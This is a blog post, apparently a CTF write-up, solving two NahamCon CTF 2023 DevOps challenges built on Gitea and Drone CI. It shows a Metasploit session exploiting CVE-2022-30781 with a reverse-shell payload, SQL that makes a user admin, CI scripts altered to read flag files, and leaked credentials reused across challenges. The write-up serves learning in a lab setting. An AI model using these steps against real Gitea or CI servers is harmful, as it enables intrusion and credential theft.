Open in app

Sign in

Write

Sign in

NahamCon CTF 2023 Devops Challenge Writeup

Lu William Hanugra
5 min readJun 18, 2023

Devops Challenge Writeup, Pirates and Supplier writeup.

NahamCon is a free virtual offensive security conference, hosted on Twitch and they also make a CTF called Nahamcon CTF 2023.

NahamCon CTF always delivers good challenges for CTF enthusiasts like me. This year, I didn’t participate much in categories other than the DevOps category. There were only two DevOps challenges this year, and I hope to see more next year.
This year me and my team in Vantage Point Security Indonesia got 10th on the scoreboard.

MAGER means ‘too lazy to move’

I wrote this writeup after seeing another writeups on the discord. After read some of them, I can say my approaches are little bit different. These 2 challenges use Gitea as the base of the application.

Gitea

Pirates (medium)

You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named Tortuga.

My attention goes straight to the drone.yml file.

---
kind: pipeline
type: exec
name: to pirate

platform:
  os: linux
  arch: amd64

steps:
  - name: to pirate
    commands:
      - ./piratize.sh
trigger:
  event:
    - push
  branch:
    - main
---
kind: signature
hmac: 213aae557e24814352839440ca22083810dfd95237da16e573115ca050823ac6

...

the summary is steps will be executed whenever there is a push into branchmain.

edit piratize.sh to:

#! /bin/sh

cat /flag.txt
pirate README_ENG.md > README.md

git add README.md
git commit -m "Automatic translation [CI SKIP]"
git push --set-upstream origin main

create a new branch and create a pull request,

but an error is stopping me.

This Pull Request doesn’t have enough approvals yet. 0 of 1 approvals granted.

The pipeline will not run until there is a merge into the main branch, so in order to merge the code, we must have at least 1 approval.

Exploit Phase

What I do was exploit the Gitea instance with CVE-2022–30781

Gitea Version 1.16.0 on the footer of the Gitea instance

There are 2 ways to exploit this CVE, the hard way and the simple way, so the hard way will be recreate HTTP service manually. Configure the endpoint to pretend to be a Gitea instance.

for example:

Request -> /api/v1/version

Response -> {“version”: “1.16.0”}

reference:

the easier way will be using metasploit installed in a server, for this definitely you need a VPS

msf6 > use exploit/multi/http/gitea_git_fetch_rce
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RPORT 30299
RPORT => 30299
msf6 exploit(multi/http/gitea_git_fetch_rce) > set RHOSTS challenge.nahamcon.com
RHOSTS => challenge.nahamcon.com
msf6 exploit(multi/http/gitea_git_fetch_rce) > set USERNAME jack
USERNAME => jack
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PASSWORD Bu7!^zTZ
PASSWORD => Bu7!^zTZ
msf6 exploit(multi/http/gitea_git_fetch_rce) > set PAYLOAD linux/x64/shell/reverse_tcp
PAYLOAD => linux/x64/shell/reverse_tcp
reverse shell success

I found gitea database and configuration located under /data/gitea

gitea data and config
SQLite3

gitea.db is a SQLite3 format file

so I extract the db file and see it using https://sqliteonline.com/

sqlite viewer online

update user jack into admin role

sqlite3 gitea.db
UPDATE user SET is_admin='1' WHERE id=4;
.exit

refresh the page

jack already an Admin

as an Admin , jack can merge the pull request

Go to http://drone.challenge.nahamcon.com:30299/

Solved

Post Exploitation Phase

Do reverse shell on the runner server

input reverse shell payload

I do some recon and found this credential, later on this credential can be used on Supplier challenge

droneci:t4K0@s!qSF

Supplier (hard)

You are given some URLs, a username, and a password for the Gitea application. After logging in, you will find a repository named infra.

infra repository

My attention goes straight to the drone.yml file, so I can learn how this pipeline work.

kind: pipeline
type: exec
name: default

platform:
  os: linux
  arch: amd64

trigger:
  event:
    - cron

steps:
  - name: tf_plan
    commands:
      - make plan

So there are already a cron job to triggered the steps, so what we want to exploit is try to change the content of Makefileso when the event triggered then the payload will be executed trough make plan command.

Exploit phase

I tried to edit the Makefile, but I can’t because the repository settings require that we must fork it and possibly make a pull request.

Try to fork, but I got this error

The owner has already reached the limit of 0 repositories.

In order to solve this issue, I tried a different approach. I thought maybe the creator of this challenge didn’t change the droneci credential in all devops challenge. And my though worked out perfectly!

this is what I found before in Pirates challenge

droneci:t4K0@s!qSF
droneci login

so droneci user can directly commit into the repository, just add cat /flag.txt into Makefile

Solved

That’s it, I hope you learn something from this simple writeup. Thank you for reading !

DevOps
Ctf Writeup
Nahamcon Ctf
Gitea
Devsecops

--

--

Lu William Hanugra

Written by Lu William Hanugra

9 Followers

Help

Status

About

Careers

Blog

Privacy

Terms

Text to speech

Teams